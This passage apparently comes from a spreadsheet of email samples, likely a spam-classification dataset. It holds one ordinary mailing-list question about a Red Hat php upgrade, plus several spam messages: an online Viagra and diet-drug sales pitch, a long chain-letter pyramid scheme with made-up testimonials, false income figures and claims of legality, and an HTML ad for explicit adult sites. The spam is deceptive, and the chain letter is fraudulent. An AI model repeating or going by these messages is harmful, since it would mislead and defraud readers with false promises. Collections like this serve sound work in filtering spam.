 --==_15304473447567@buffy.jpci.net==_--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [WM] BiLiYORUZ REKLAMA iHTiYACINIZ VAR! BUNUN iCiN BURADAYIZ.. 25.07.2002 10:31:20
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: latest php upgrade in 7.3
</t>
  </si>
  <si>
    <t xml:space="preserve">Today an apt-get upgrade holds back php (and submodules, like php-imap). 
   Running an apt-get install php to see what's up, I get:
 # apt-get install php
 Processing File Dependencies... Done
 Reading Package Lists... Done
 Building Dependency Tree... Done
 The following extra packages will be installed:
    curl-devel imap imap-devel mysql mysql-devel php-imap php-ldap postgresql
    postgresql-devel postgresql-libs pspell-devel ucd-snmp-devel 
 ucd-snmp-utils
    unixODBC unixODBC-devel
 The following NEW packages will be installed:
    curl-devel imap imap-devel mysql mysql-devel postgresql postgresql-devel
    postgresql-libs pspell-devel ucd-snmp-devel ucd-snmp-utils unixODBC
    unixODBC-devel
 The following packages will be upgraded
    php php-imap php-ldap
 3 packages upgraded, 13 newly installed, 0 to remove(replace) and 1 not 
 upgraded.
 Anyone have an idea what the heck RedHat did here, and why we're now 
 trying to install a ton of crap I don't want?  (I'm hoping someone else 
 has chased this down and could save me time... ;) )
 thx,
 -te
 -- 
 Troy Engel, Systems Engineer
 Cool as the other side of the pillow
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Your Online Prescription Source                 N
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multipart message in MIME format.
 --051BAE1A473A4B5C87F4200EB48BA2FC
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;&lt;title&gt;Doctors Online&lt;/title&gt;&lt;/head&gt;&lt;body bgcolor=3D"#ffffff"&gt;
 &lt;p&gt;&lt;font size=3D"+1" face=3D"Arial"&gt;&lt;b&gt;Viagra&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;pre&gt;Viagra is available online and is shipped ove=
 rnight. Our US licensed
 doctors will evaluate your medical history (online form that takes
 under 3 minutes to complete) and if you qualify for Viagra your order
 will be processed and shipped overnight. Viagra is used by millions of
 men it the US everyday. If you feel that your erection could be
 better, try Viagra. All orders shipped discreetly via FedEx&lt;/pre&gt;&lt;/font&gt;&lt;/=
 p&gt;
 &lt;p&gt;&lt;a href=3D"http://www.universalmeds.com/main2.php?rx=3D15896"&gt;&lt;font fac=
 e=3D"Arial"&gt;&lt;b&gt;ORDER NOW&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font size=3D"+1" face=3D"Arial"&gt;&lt;b&gt;Phentermine&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;pre&gt;Obesity weight loss drug. It enables people t=
 o burn more fat doing
 nothing, stimulating your nervous system!&lt;/pre&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href=3D"http://www.universalmeds.com/main2.php?rx=3D15896"&gt;&lt;font fac=
 e=3D"Arial"&gt;&lt;b&gt;ORDER NOW&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font size=3D"+1" face=3D"Arial"&gt;&lt;b&gt;Meridia&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;pre&gt;Is an FDA-approved oral prescription medicati=
 on that is used for the
 medical management of obesity, including weight loss and the
 maintenance of weight loss.&lt;/pre&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href=3D"http://www.universalmeds.com/main2.php?rx=3D15896"&gt;&lt;font fac=
 e=3D"Arial"&gt;&lt;b&gt;ORDER NOW&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font size=3D"+1" face=3D"Arial"&gt;&lt;b&gt;Xenical&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;pre&gt;Blocks the fat you are eating from being abso=
 rb by your body. No need
 for those exhausting exercise anymore!&lt;/pre&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href=3D"http://www.universalmeds.com/main2.php?rx=3D15896"&gt;&lt;font fac=
 e=3D"Arial"&gt;&lt;b&gt;ORDER NOW&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font size=3D"+1" face=3D"Arial"&gt;&lt;b&gt;Propecia&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;pre&gt;is a medical breakthrough. The first pill tha=
 t effectively treats male
 pattern hair loss. It con-tains finasteride.&lt;/pre&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href=3D"http://www.universalmeds.com/main2.php?rx=3D15896"&gt;&lt;font fac=
 e=3D"Arial"&gt;&lt;b&gt;ORDER NOW&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;hr&gt;
 &lt;font face=3D"Arial" size=3D"1"&gt;
 &lt;a href=3D"http://213.139.76.181/remove.php"&gt;Click Here to be removed&lt;/a&gt;,=
  and you will *never* receive another email from us! Thank you.&lt;/font&gt;
 &lt;br&gt;&lt;br&gt;
 Outgoing
 &lt;/body&gt;
 &lt;/html&gt;
 --051BAE1A473A4B5C87F4200EB48BA2FC
 Content-Type: text/plain
 Content-Disposition: inline
 ______________________________________________________________________
 This messsage was sent using the trial version of the 
 1st Class Mail Server software.  You can try it for free
 at http://www.1cis.com/download/1cismail.asp
 Is this unsolicited email?  Instructions for reporting unsolicited
 email can be found at at http://www.1cis.com/articles/spam.asp
 --051BAE1A473A4B5C87F4200EB48BA2FC--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Last time you spent $25 did u make $100,000,s? Well this time you will. wju
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello
 You may have seen this business before and
 ignored it. I know I did - many times! However,
 please take a few moments to read this letter.
 I was amazed when the profit potential of this
 business finally sunk in... and it works!
 With easy-to-use e-mail tools and opt-in e-mail,
 success in this business is now fast, easy and
 well within the capabilities of ordinary people
 who know little about internet marketing. And the
 earnings potential is truly staggering!
 I'll make you a promise. READ THIS E-MAIL TO THE END! -
 follow what it says to the letter - and you will not
 worry whether a RECESSION is coming or not, who is
 President, or whether you keep your current job or not.
 Yes, I know what you are thinking. I never responded
 to one of these before either. One day though,
 something just said: "You throw away $25.00 going to
 a movie for 2 hours with your wife. What the heck."
 Believe me, no matter where you believe those "feelings"
 come from, I thank every day that I had that feeling. 
 I cannot imagine where I would be or what I would be
 doing had I not. Read on. It's true. Every word of it.
 It is legal. I checked. Simply because you are buying
 and selling something of value.
 AS SEEN ON NATIONAL TV:
 Making over half a million dollars every 4 to 5
 months from your home.
 THANKS TO THE COMPUTER AGE AND THE INTERNET!
 ==================================================
 BE AN INTERNET MILLIONAIRE LIKE OTHERS WITHIN A YEAR!!!
 Before you say "Bull", please read the following.
 This is the letter you have been hearing about on the
 news lately. Due to the popularity of this letter on
 the internet, a national weekly news program recently
 devoted an entire show to the investigation of this
 program described below, to see if it really can make
 people money. The show also investigated whether or
 not the program was legal.
 Their findings proved once and for all that there are
 "absolutely NO laws prohibiting the participation in
 the program and if people can 'follow the simple
 instructions' they are bound to make some mega bucks
 with only $25 out of pocket cost".
 DUE TO THE RECENT INCREASE OF POPULARITY &amp; RESPECT
 THIS PROGRAM HAS ATTAINED, IT IS CURRENTLY WORKING
 BETTER THAN EVER.
 This is what one had to say: "Thanks to this
 profitable opportunity. I was approached many times
 before but each time I passed on it. I am so glad
 I finally joined just to see what one could expect
 in return for the minimal effort and money required.
 To my astonishment, I received a total $610,470.00
 in 21 weeks, with money still coming in."
 Pam Hedland, Fort Lee, New Jersey.
 ==================================================
 Another said: "This program has been around for a
 long time but I never believed in it. But one day
 when I received this again in the mail I decided
 to gamble my $25 on it. I followed the simple
 instructions and walaa ..... 3 weeks later the
 money started to come in. First month I only made
 $240.00 but the next 2 months after that I made
 a total of $290,000.00. So far, in the past 8 months
 by re-entering the program, I have made over
 $710,000.00 and I am playing it again. The key to
 success in this program is to follow the simple
 steps and NOT change anything."
 More testimonials later but first, =======
 ==== PRINT THIS NOW FOR YOUR FUTURE REFERENCE ====
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 If you would like to make at least $500,000 every
 4 to 5 months easily and comfortably, please read the
 following...THEN READ IT AGAIN and AGAIN!!!
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 FOLLOW THE SIMPLE INSTRUCTION BELOW AND 
 YOUR FINANCIAL DREAMS WILL COME TRUE, GUARANTEED!
 INSTRUCTIONS:
 =====Order all 5 reports shown on the list below =====
 For each report, send $5 CASH, THE NAME &amp; NUMBER OF THE
 REPORT YOU ARE ORDERING and YOUR E-MAIL ADDRESS to the
 person whose name appears ON THAT LIST next to the report.
 MAKE SURE YOUR RETURN ADDRESS IS ON  YOUR ENVELOPE TOP
 LEFT CORNER in case of any mail problems.
 ===WHEN YOU PLACE YOUR ORDER, MAKE SURE ===
 ===YOU ORDER EACH OF THE 5 REPORTS! ===
 You will need all 5 reports so that you can save
 them on your computer and resell them.
 YOUR TOTAL COST $5 X 5 = $25.00.
 Within a few days you will receive, via e-mail, each
 of the 5 reports from these 5 different individuals.
 Save them on your computer so they will be accessible
 for you to send to the 1,000's of people who will
 order them from you. Also make a floppy of these
 reports and keep it on your desk in case something
 happens to your computer.
 IMPORTANT - DO NOT alter the names of the people who
 are listed next to each report, or their sequence on
 the list, in any way other than what is instructed
 below in steps 1 through 6 or you will lose out
 on the majority of your profits. Once you
 understand the way this works, you will also
 see how it will not work if you change it. 
 Remember, this method has been tested, and if you
 alter it, it will NOT work!!! People have tried
 to put their friends'/relatives' names on all five
 thinking they could get all the money. But it does
 not work this way. Believe us, some have tried to
 be greedy and then nothing happened. So Do Not
 try to change anything other than what is instructed.
 Because if you do, it will not work for you.
 Remember, honesty reaps the reward!!! 
 This IS a legitimate BUSINESS. You are offering a
 product for sale and getting paid for it. Treat it
 as such and you will be VERY profitable in a short
 period of time.
 1.. After you have ordered all 5 reports, take this
 advertisement and REMOVE the name &amp; address of the
 person in REPORT # 5. This person has made it through
 the cycle and is no doubt counting their fortune.
 2.. Move the name &amp; address in REPORT # 4 down TO REPORT # 5.
 3.. Move the name &amp; address in REPORT # 3 down TO REPORT # 4.
 4.. Move the name &amp; address in REPORT # 2 down TO REPORT # 3.
 5.. Move the name &amp; address in REPORT # 1 down TO REPORT # 2
 6.... Insert YOUR name &amp; address in the REPORT # 1 Position.
 PLEASE MAKE SURE you copy every name &amp; address
 ACCURATELY! This is critical to YOUR success.
 ==================================================
 **** Take this entire letter, with the modified
 list of names, and save it on your computer.
 DO NOT MAKE ANY OTHER CHANGES.
 Save this on a disk as well just in case you lose
 any data. To assist you with marketing your business
 on the internet, the 5 reports you purchase will
 provide you with invaluable marketing information
 which includes how to send bulk e-mails legally,
 where to find thousands of free classified ads and
 much more. There are 2 primary methods to get this
 venture going:
 METHOD # 1: BY SENDING BULK E-MAIL LEGALLY
 ==================================================
 Let's say that you decide to start small, just to see
 how it goes, and we will assume you and those involved
 send out only 5,000 e-mails each. Let's also assume
 that the mailing receives only a 0.2% (2/10 of 1%)
 response (the response could be much better but let's
 just say it is only 0.2%). Also many people will send
 out hundreds of thousands of e-mails instead of only
 5,000 each.
 Continuing with this example, you send out only
 5,000 e-mails. With a 0.2% response, that is only
 10 orders for report # 1. Those 10 people responded
 by sending out 5,000 e-mails each for a total of
 50,000. Out of those 50,000 e-mails only 0.2%
 responded with orders. That's 100 people who
 responded and ordered Report # 2.
 Those 100 people mail out 5,000 e-mails each for
 a total of 500,000 e-mails. The 0.2% response to
 that is 1000 orders for Report # 3.
 Those 1000 people send 5,000 e-mails each for a
 total of 5 million e-mails sent out. The 0.2%
 response is 10,000 orders for Report # 4.
 Those 10,000 people send out 5,000 e-mails each
 for a total of 50,000,000 (50 million) e-mails.
 The 0.2% response to that is 100,000 orders for
 Report # 5.
 THAT'S 100,000 ORDERS TIMES $5 EACH = $500,000.00
 (half a million dollars).
 Your total income in this example is: 1..... $50
 + 2..... $500 + 3.....$5,000 + 4..... $50,000
 + 5.... $500,000 .... Grand Total=$555,550.00
 NUMBERS DO NOT LIE. GET A PENCIL &amp; PAPER AND
 FIGURE OUT THE WORST POSSIBLE RESPONSES AND NO
 MATTER HOW YOU CALCULATE IT, YOU WILL STILL
 MAKE A LOT OF MONEY!
 ==================================================
 REMEMBER FRIEND, THIS IS ASSUMING ONLY 10 PEOPLE
 ORDERING OUT OF 5,000 YOU MAILED TO. Dare to think
 for a moment what would happen if everyone or half
 or even one 4th of those people mailed 100,000
 e-mails each or more?
 There are over 150 million people on the internet
 worldwide and counting, with thousands more coming
 online every day. Believe me, many people will do
 just that, and more!
 METHOD # 2: BY PLACING FREE ADS ON THE INTERNET
 ==================================================
 Advertising on the net is very, very inexpensive and
 there are hundreds of FREE places to advertise.
 Placing a lot of free ads on the internet will
 easily get a larger response. We strongly suggest
 you start with Method # 1 and add METHOD # 2 as you
 go along. For every $5 you receive, all you must
 do is e-mail them the report they ordered. That's it.
 Always provide same day service on all orders.
 This will guarantee that the e-mail they send out,
 with your name and address on it, will be prompt
 because they cannot advertise until they receive
 the report.
 ===========AVAILABLE REPORTS ====================
 The reason for the "cash" is not because this is
 illegal or somehow "wrong". It is simply about time.
 Time for checks or credit cards to be cleared or
 approved, etc. Concealing it is simply so no one
 can SEE there is money in the envelope and steal
 it before it gets to you.
 ORDER EACH REPORT BY ITS NUMBER &amp; NAME ONLY.
 Notes: Always send $5 cash (U.S. CURRENCY) for
 each report. Checks NOT accepted. Make sure the
 cash is concealed by wrapping it in at least
 2 sheets of paper. On one of those sheets of
 paper, write the NUMBER &amp; the NAME of the report
 you are ordering, YOUR E-MAIL ADDRESS and your
 name and postal address.
 PLACE YOUR ORDER FOR THESE REPORTS NOW :
 ==================================================
 REPORT # 1: "The Insider's Guide To Advertising
 for Free On The Net"
 Order Report #: 1 from
 Rui Sousa Santos
 P.O. Box 132
 Taylors Lakes VIC  3038
 Australia
  ______________________________________________________
 REPORT # 2: "The Insider's Guide To Sending Bulk
 Email On The Net"
 Order Report # 2 from: 
 Richard Moulton
 P.O. Box 82
 Hot Springs,MT 59845
 USA
  ___________________________________________________
 REPORT # 3: "Secret To Multilevel Marketing On The Net"
 Order Report # 3 from: 
 J.siden
 krondikesvgen 54 A
 83147 stersund
 Sweden
  _____________________________________________________
 REPORT # 4: "How To Become A Millionaire Using
 MLM &amp; The Net"
 Order Report # 4 from: 
 Francis Kidd
 P.O. Box 209
 Homestead,PA 15120
 USA
  __________________________________________________
 REPORT # 5: "How To Send Out One Million Emails
 For Free"
 Order Report # 5 From: 
 M.J. Lee
 P.O. Box 19
 52 Victoria Drive
 London SW19 6BD
 United Kingdom
 ______________________________________________________
 $$$$$$$$$ YOUR SUCCESS GUIDELINES $$$$$$$$$$$
 Follow these guidelines to guarantee your success:
 === If you do not receive at least 10 orders for
 Report #1 within 2 weeks, continue sending e-mails
 until you do.
 === After you have received 10 orders, 2 to 3 weeks
 after that you should receive 100 orders or more for
 REPORT # 2. If you do not, continue advertising or
 sending e-mails until you do.
 ** Once you have received 100 or more orders for
 Report # 2, YOU CAN RELAX, because the system is
 already working for you, and the cash will continue
 to roll in ! THIS IS IMPORTANT TO REMEMBER: Every time
 your name is moved down on the list, you are placed
 in front of a different report.
 You can KEEP TRACK of your PROGRESS by watching which
 report people are ordering from you. IF YOU WANT TO
 GENERATE MORE INCOME SEND ANOTHER BATCH OF E-MAILS
 AND START THE WHOLE PROCESS AGAIN. There is NO LIMIT
 to the income you can generate from this business !!!
 =================================================
 FOLLOWING IS A NOTE FROM THE ORIGINATOR OF THIS PROGRAM: 
 You have just received information that can give you
 financial freedom for the rest of your life, with
 NO RISK and JUST A LITTLE BIT OF EFFORT. You can
 make more money in the next few weeks and months
 than you have ever imagined. Follow the program
 EXACTLY AS INSTRUCTED. Do Not change it in any way.
 It works exceedingly well as it is now.
 Remember to e-mail a copy of this exciting report
 after you have put your name and address in
 Report #1 and moved others to #2 .....# 5 as
 instructed above. One of the people you send this
 to may send out 100,000 or more e-mails and your
 name will be on every one of them. 
 Remember though, the more you send out the more
 potential customers you will reach. So my friend,
 I have given you the ideas, information, materials
 and opportunity to become financially independent.
 IT IS UP TO YOU NOW !
 =============MORE TESTIMONIALS===============
 "My name is Mitchell. My wife, Jody and I live in
 Chicago. I am an accountant with a major U.S.
 Corporation and I make pretty good money. When I
 received this program I grumbled to Jody about
 receiving 'junk mail'. I made fun of the whole
 thing, spouting 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received total $ 147,200.00 ......... all cash!
 I was shocked. I have joined Jody in her 'hobby'."
 Mitchell Wolf M.D., Chicago, Illinois
 ================================================
 "Not being the gambling type, it took me several
 weeks to make up my mind to participate in this plan.
 But conservative as I am, I decided that the initial
 investment was so little that there was just no way
 that I wouldn't get enough orders to at least get
 my money back. I was surprised when I found my
 medium size post office box crammed with orders.
 I made $319,210.00 in the first 12 weeks. 
 The nice thing about this deal is that it does not
 matter where people live. There simply isn't a
 better investment with a faster return and so big."
 Dan Sondstrom, Alberta, Canada
 =================================================
 "I had received this program before. I deleted it,
 but later I wondered if I should have given it a try.
 Of course, I had no idea who to contact to get
 another copy, so I had to wait until I was e-mailed
 again by someone else......... 11 months passed then
 it luckily came again...... I did not delete this one!
 I made more than $490,000 on my first try and all the
 money came within 22 weeks."
 Susan De Suza, New York, N.Y.
 =================================================
 "It really is a great opportunity to make relatively
 easy money with little cost to you. I followed the
 simple instructions carefully and within 10 days the
 money started to come in. My first month I made $20,
 in the 2nd month I made $560.00 and by the end of the
 third month my total cash count was $362,840.00.
 Life is beautiful, Thanx to internet."
 Fred Dellaca, Westport, New Zealand
 =================================================
 ORDER YOUR REPORTS TODAY AND GET STARTED ON YOUR
 ROAD TO FINANCIAL FREEDOM !
 =================================================
 If you have any questions of the legality of this
 program, contact the Office of Associate Director
 for Marketing Practices, Federal Trade Commission,
 Bureau of Consumer Protection, Washington, D.C.
 This message is sent in compliance of the proposed
 bill SECTION 301, paragraph (a)(2)(C) of S. 1618. 
 * This message is not intended for residents in the
 State of Washington, Virginia or California,
 screening of addresses has been done to the best
 of our technical ability.
 *  This is a one time mailing and this list will
 never be used again.
 slaxflhxbkltlrolpefciayxx
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fw: Offring Membership To 16 Sites For Life yyyy@netnoteinc.com aymou
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;center&gt;
 &lt;table border="0" cellpadding="4" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber1" width="517"&gt;
 &lt;tr&gt;
 &lt;td width="509"&gt;
 &lt;p align="center"&gt;&lt;font face="Arial Black" size="5" color="#FF0000"&gt;Adult Club FREE VIP Membership jm@netnoteinc.com&lt;br&gt;
 16 Adult Sites For Life&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width="509"&gt;&lt;i&gt;&lt;font face="Arial" size="2"&gt;&lt;b&gt;&lt;font color="#FF0000"&gt;8 New Sites added today &lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 You now have access to 16 of the best adult sites on the internet.&lt;b&gt;&lt;br&gt;
 &lt;/b&gt;&lt;br&gt;
 &lt;font color="#ff0000"&gt;&lt;b&gt;HOT OF THE PRESS NEWS!!!&amp;nbsp;&lt;/b&gt; &lt;/font&gt;With just over 2.1 Million Members that signed up for FREE, Last month there were 629,947 New Members. Are you one of them yet???&lt;/font&gt;&lt;/i&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width="509"&gt;&lt;b&gt;&lt;i&gt;&lt;font face="Arial" size="2"&gt;Step 1.&lt;/font&gt;&lt;/i&gt;&lt;font size="2"&gt;&lt;i&gt;&amp;nbsp; Read our&lt;/i&gt;&lt;/font&gt;&lt;/b&gt;&lt;font face="Arial" size="2"&gt;&lt;b&gt; &lt;font color="#FF0000"&gt;&lt;i&gt;Q&lt;/i&gt;&lt;/font&gt; &lt;/b&gt;&lt;/font&gt;&lt;b&gt;&lt;i&gt;&lt;font size="2"&gt;and&lt;/font&gt;&lt;/i&gt;&lt;font face="Arial" size="2"&gt; &lt;font color="#FF0000"&gt;&lt;i&gt;A&lt;/i&gt;&lt;/font&gt;&lt;/font&gt;&lt;font color="#FF0000"&gt;&lt;i&gt;&lt;font size="2"&gt;...&lt;/font&gt;&lt;/i&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width="509"&gt;&lt;font face="Arial" size="2"&gt;&lt;b&gt;Q. &lt;/b&gt;Why are you offering free access to&amp;nbsp;&lt;/font&gt;&lt;font size="2" face="Arial Black" color="#FF0000"&gt;16&lt;/font&gt;&lt;font face="Arial" size="2"&gt; adult membership sites for free?&lt;br&gt;
 &lt;i&gt;&lt;b&gt;A. &lt;/b&gt;I have advertisers that pay me for ad space so you don't have to pay for membership.&lt;/i&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;b&gt;Q. &lt;/b&gt;Is it true my membership is for life?&lt;br&gt;
 &lt;i&gt;&lt;b&gt;A. &lt;/b&gt;Absolutely you'll never have to pay a cent the advertisers do.&lt;/i&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;b&gt;Q. &lt;/b&gt;Can I give my account to my friends and family? &lt;br&gt;
 &lt;i&gt;&lt;b&gt;A. &lt;/b&gt;Yes, as long they are over the age of 18.&lt;/i&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;b&gt;Q. &lt;/b&gt;Do I have to sign up for all &lt;/font&gt;&lt;font size="2" face="Arial Black" color="#FF0000"&gt;16&lt;/font&gt;&lt;font face="Arial" size="2"&gt; membership sites?&lt;br&gt;
 &lt;i&gt;&lt;b&gt;A. &lt;/b&gt;No just one to get access to all of them. &lt;/i&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;b&gt;Q. &lt;/b&gt;How do I get started? &lt;br&gt;
 &lt;i&gt;&lt;b&gt;A. &lt;/b&gt;Click on one of the following links below to become a member.&lt;/i&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width="509"&gt;&lt;b&gt;&lt;i&gt;&lt;font face="Arial" size="2"&gt;Step 2.&lt;/font&gt;&lt;/i&gt;&lt;font size="2"&gt;&lt;i&gt; Pick A Site&lt;br&gt;
 &lt;/i&gt;&lt;/font&gt;&lt;/b&gt;&lt;font size="2"&gt;&lt;i&gt;&amp;nbsp;you only need to sign-up for 1 to access sites&lt;/i&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width="509"&gt;&lt;font face="Arial Black"&gt;# 16&lt;font color="#FF0000"&gt;&lt;i&gt; New &lt;/i&gt;&lt;/font&gt;&amp;gt; &lt;a href="http://209.203.174.9/farm/?aid=252611"&gt;Adults Farm&lt;/a&gt;&lt;br&gt;
 &lt;/font&gt;&lt;br&gt;
 &lt;font face="Arial Black"&gt;# 15 &lt;font color="#FF0000"&gt;&lt;i&gt;New &lt;/i&gt;&lt;/font&gt;&amp;gt; &lt;a href="http://209.203.174.9/play/?aid=252611"&gt;Play House Porn&lt;/a&gt;&lt;br&gt;
 &lt;/font&gt;&lt;br&gt;
 &lt;font face="Arial Black"&gt;# 14 &lt;font color="#FF0000"&gt;&lt;i&gt;New &lt;/i&gt;&lt;/font&gt;&amp;gt; &lt;a href="http://209.203.174.9/asian/?aid=252611"&gt;Asian Sex Fantasies&lt;/a&gt;&lt;br&gt;
 &lt;/font&gt;&lt;br&gt;
 &lt;font face="Arial Black"&gt;# 13 &lt;font color="#FF0000"&gt;&lt;i&gt;New &lt;/i&gt;&lt;/font&gt;&amp;gt; &lt;a href="http://209.203.174.9/lesbian/?aid=252611"&gt;Lesbian Lace&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;font face="Arial Black"&gt;# 12 &lt;font color="#FF0000"&gt;&lt;i&gt;New &lt;/i&gt;&lt;/font&gt;&amp;gt; &lt;a href="http://209.203.174.9/tits/?aid=252611"&gt;Tits Patrol&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;font face="Arial Black"&gt;# 11 &lt;font color="#FF0000"&gt;&lt;i&gt;New &lt;/i&gt;&lt;/font&gt;&amp;gt; &lt;a href="http://209.203.174.9/sinful/?aid=252611"&gt;Sinful Cherries&lt;/a&gt;&lt;br&gt;
 &lt;/font&gt;&lt;br&gt;
 &lt;font face="Arial Black"&gt;# 10 &lt;font color="#FF0000"&gt;&lt;i&gt;New &lt;/i&gt;&lt;/font&gt;&amp;gt; &lt;a href="http://209.203.174.9/stripper/?aid=252611"&gt;Hot Stripper Sluts&lt;/a&gt;&lt;/font&gt;&lt;p&gt;&lt;font face="Arial Black"&gt;# 9 &lt;font color="#FF0000"&gt;&lt;i&gt;New &lt;/i&gt;&lt;/font&gt;&amp;gt; &lt;a href="http://209.203.174.9/celebs/?aid=252611"&gt;Sexy Celebes&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Arial Black"&gt;# 8 &amp;gt; &lt;a href="http://209.203.174.4/sk_115/4_29_iwantateenqueen/"&gt;I WANT A TEEN QUEEN&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Arial Black"&gt;# 7 &lt;/font&gt;&lt;font face="Arial Black"&gt;&amp;gt; &lt;a href="http://209.203.174.4/sk_115/48927/"&gt;BARLEY LEGAL TEENS&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Arial Black"&gt;# 6 &lt;/font&gt;&lt;font face="Arial Black"&gt;&amp;gt; &lt;a href="http://209.203.174.4/sk_115/414/"&gt;KINKY FARM&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Arial Black"&gt;# 5 &amp;gt; &lt;a href="http://209.203.174.4/sk_115/4_29_wildasianbabes/"&gt;WILD ASIAN BABES&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Arial Black"&gt;# 4 &amp;gt; &lt;a href="http://209.203.174.4/sk_115/9551/"&gt;COLLEGE BAD GIRLS&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Arial Black"&gt;# 3 &amp;gt; &lt;a href="http://209.203.174.4/sk_115/3322/"&gt;HOT WET MODELS&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Arial Black"&gt;# 2 &amp;gt; &lt;a href="http://209.203.174.4/sk_115/4_29_boobranch/"&gt;BOOB RANCH&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Arial Black"&gt;# 1 &amp;gt; &lt;a href="http://209.203.174.4/sk_115/119955/"&gt;HOLLYWOOD SLUTS&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width="509"&gt;
 &lt;p align="center"&gt;&lt;i&gt;&lt;font color="#FF0000" size="6"&gt;new and free!!&lt;/font&gt;&lt;/i&gt; &lt;br&gt;
 &lt;b&gt;&lt;font face="Verdana" size="5" color="#FFFFFF"&gt;&lt;a target="_blank" href="http://209.203.174.4/sk_115/4_29_iwantateenqueen/"&gt;FREE TEEN HARDCORE CLICK HERE!&lt;/a&gt;&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;a target="_blank" href="http://www.freevirginfuckers.com/eaff"&gt;&lt;/font&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width="509"&gt;
 &lt;p align="center"&gt;&lt;map name="FPMap0"&gt;
 &lt;area target="_blank" coords="4, 4, 174, 140" shape="rect" href="http://209.203.174.4/sk_115/4_29_wildasianbabes/"&gt;
 &lt;area target="_blank" href="http://209.203.174.4/sk_115/4_29_wildasianbabes/" shape="rect" coords="4, 4, 174, 140"&gt;
 &lt;area target="_blank" coords="2, 163, 169, 291" shape="rect" href="http://209.203.174.4/sk_115/4_29_boobranch/"&gt;
 &lt;area target="_blank" coords="177, 6, 449, 297" shape="rect" href="http://209.203.174.4/sk_115/4_29_iwantateenqueen/"&gt;
 &lt;/map&gt;&lt;img border="2" src="http://209.203.174.5/art/spam3done.jpg" usemap="#FPMap0" width="450" height="300"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width="509"&gt;
 &lt;p align="center"&gt;&lt;i&gt;&lt;font color="#FF0000" size="6"&gt;new and free!!&lt;/font&gt;&lt;/i&gt; &lt;br&gt;
